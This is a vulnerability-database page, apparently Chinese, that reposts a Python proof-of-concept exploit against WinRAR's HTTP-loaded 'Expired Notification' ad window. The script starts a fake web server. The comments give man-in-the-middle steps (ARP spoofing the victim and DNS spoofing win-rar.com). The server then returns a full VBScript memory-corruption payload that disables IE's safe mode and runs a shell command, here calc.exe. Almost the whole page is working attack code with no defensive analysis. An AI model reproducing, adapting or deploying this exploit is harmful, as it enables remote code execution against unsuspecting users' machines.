WinRAR Expired Notification Command Execution

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1041192 漏洞类型
发布时间 2015-10-02 更新时间 2015-10-02
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2015100014
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
#!/usr/bin/python -w
# Title : WinRar Expired Notification - OLE Remote Command Execution
# Date : 30/09/2015
# Author : R-73eN
# Tested on : Windows Xp SP3 with WinRAR 5.21
# This exploits a vulnerability in the implementation of showing ads.
# When a user opens any WINRAR file sometimes
# A window with Expired Notification title loads http://www.win-rar.com/notifier/ 
# reminding user to buy winrar to remove ads.
# Since this uses a http connection we can use Man In The Middle attack
# to gain Remote Code Execution
#
# Triggering the vulnerability
# 1) Run this python script.
# 2) arpspoof the target
# 3) dnsspoof www.win-rar.com to point to your IP
# 4) Wait for the victim to open WinRar files.
#
# Video :  https://youtu.be/h976wFlHGw4
#
# i hope this time the "great security researcher" Mohammad Reza Espargham
# me[at]reza[dot]es , reza.espargham[at]gmail[dot]com doesnt steals again my exploit .....
#
# http://0day.today/exploit/description/24292 My exploit publishied in 25/09/2015
# http://0day.today/exploit/description/24296 same exploit written in perl publishied in 26/09/2015
# 
#
#

banner = ""
banner +="  ___        __        ____                 _    _  \n" 
banner +=" |_ _|_ __  / _| ___  / ___| ___ _ __      / \  | |    \n"
banner +="  | || '_ \| |_ / _ \| |  _ / _ \ '_ \    / _ \ | |    \n"
banner +="  | || | | |  _| (_) | |_| |  __/ | | |  / ___ \| |___ \n"
banner +=" |___|_| |_|_|  \___/ \____|\___|_| |_| /_/   \_\_____|\n\n"
print banner
print " [+] WinRar (Free Version) - Remote Command Execution [+]\n"
import socket

CRLF = "\r\n"
#OLE command execution
exploit = """<html>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >
<head>
</head>
<body>
 
<SCRIPT LANGUAGE="VBScript">

function runmumaa() 
On Error Resume Next
set shell=createobject("Shell.Application")
shell.ShellExecute "calc.exe", "runas", 0
end function
</script>
 
<SCRIPT LANGUAGE="VBScript">
  
dim   aa()
dim   ab()
dim   a0
dim   a1
dim   a2
dim   a3
dim   win9x
dim   intVersion
dim   rnda
dim   funclass
dim   myarray
 
Begin()
 
function Begin()
  On Error Resume Next
  info=Navigator.UserAgent
 
  if(instr(info,"Win64")>0)   then
     exit   function
  end if
 
  if (instr(info,"MSIE")>0)   then 
             intVersion = CInt(Mid(info, InStr(info, "MSIE") + 5, 2))   
  else
     exit   function  
              
  end if
 
  win9x=0
 
  BeginInit()
  If Create()=True Then
     myarray=        chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00)
     myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0)
 
     if(intVersion<4) then
         document.write("<br> IE")
         document.write(intVersion)
         runshellcode()                    
     else  
          setnotsafemode()
     end if
  end if
end function
 
function BeginInit()
   Randomize()
   redim aa(5)
   redim ab(5)
   a0=13+17*rnd(6)
   a3=7+3*rnd(5)
end function
 
function Create()
  On Error Resume Next
  dim i
  Create=False
  For i = 0 To 400
    If Over()=True Then
       Create=True
       Exit For
    End If 
  Next
end function
 
sub testaa()
end sub
 
function mydata()
    On Error Resume Next
     i=testaa
     i=null
     redim  Preserve aa(a2)  
   
     ab(0)=0
     aa(a1)=i
     ab(0)=6.36598737437801E-314
 
     aa(a1+2)=myarray
     ab(2)=1.74088534731324E-310  
     mydata=aa(a1)
     redim  Preserve aa(a0)  
end function 
 
 
function setnotsafemode()
    On Error Resume Next
    i=mydata()  
    i=rum(i+8)
    i=rum(i+16)
    j=rum(i+&h134)  
    for k=0 to &h60 step 4
        j=rum(i+&h120+k)
        if(j=14) then
              j=0          
              redim  Preserve aa(a2)             
     aa(a1+2)(i+&h11c+k)=ab(4)
              redim  Preserve aa(a0)  
 
     j=0 
              j=rum(i+&h120+k)   
          
               Exit for
           end if
 
    next 
    ab(2)=1.69759663316747E-313
    runmumaa() 
end function
 
function Over()
    On Error Resume Next
    dim type1,type2,type3
    Over=False
    a0=a0+a3
    a1=a0+2
    a2=a0+&h8000000
   
    redim  Preserve aa(a0) 
    redim   ab(a0)     
   
    redim  Preserve aa(a2)
   
    type1=1
    ab(0)=1.123456789012345678901234567890
    aa(a0)=10
           
    If(IsObject(aa(a1-1)) = False) Then
       if(intVersion<4) then
           mem=cint(a0+1)*16             
           j=vartype(aa(a1-1))
           if((j=mem+4) or (j*8=mem+8)) then
              if(vartype(aa(a1-1))<>0)  Then    
                 If(IsObject(aa(a1)) = False ) Then             
                   type1=VarType(aa(a1))
                 end if               
              end if
           else
             redim  Preserve aa(a0)
             exit  function
 
           end if 
        else
           if(vartype(aa(a1-1))<>0)  Then    
              If(IsObject(aa(a1)) = False ) Then
                  type1=VarType(aa(a1))
              end if               
            end if
        end if
    end if
               
     
    If(type1=&h2f66) Then         
          Over=True      
    End If  
    If(type1=&hB9AD) Then
          Over=True
          win9x=1
    End If  
 
    redim  Preserve aa(a0)          
         
end function
 
function rum(add) 
    On Error Resume Next
    redim  Preserve aa(a2)  
   
    ab(0)=0   
    aa(a1)=add+4     
    ab(0)=1.69759663316747E-313       
    rum=lenb(aa(a1))  
    
    ab(0)=0
    redim  Preserve aa(a0)
end function
 
</script>
 
</body>
</html>"""

response = "HTTP/1.1 200 OK" + CRLF + "Content-Type: text/html" + CRLF + "Connection: close" + CRLF + "Server: Apache" + CRLF + "Content-Length: " + str(len(exploit)) + CRLF + CRLF + exploit + CRLF 
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
host = raw_input(" Enter Local IP: ")
server_address = (host, 8080)
sock.bind(server_address)
print "\n[+] Server started " + host +  " [+]"
sock.listen(1)
print "\n[+] Waiting for request . . . [+]"
print "\n[+] Arpspoof target , and make win-rar.com to point to your IP [+]"
connection, client_address = sock.accept()
while True:
    connection.recv(2048)
    print "[+] Got request , sending exploit . . .[+]"
    connection.send(exploit)
    print "[+] Exploit sent , A calc should pop up . .  [+]"
    print "\nhttps://www.infogen.al/\n"
    exit(0)